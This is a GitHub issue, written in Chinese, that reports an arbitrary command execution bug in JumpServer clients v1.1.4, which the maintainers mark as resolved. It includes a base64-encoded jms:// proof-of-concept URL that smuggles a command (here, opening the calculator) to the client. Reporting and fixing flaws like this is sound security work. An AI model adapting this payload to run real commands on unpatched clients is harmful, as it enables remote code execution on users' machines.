[Bug] 任意命令执行
zzyzhangziyu opened this issue · comments
clients v1.1.4
Bug 描述
clients v1.1.4 没有对jms url的命令进行验证,任意命令可以下发到客户端
Bug 重现步骤(有截图更好)
poc jms://eyJwcm90b2NvbCI6Inh4eCIsInVzZXJuYW1lIjoieHh4IiwiY29tbWFuZCI6ImNhbGMifQ==
上面的poc 可以打开calc
收到
已解决
jumpserver / clients
JumpServer PC/Mac 客户端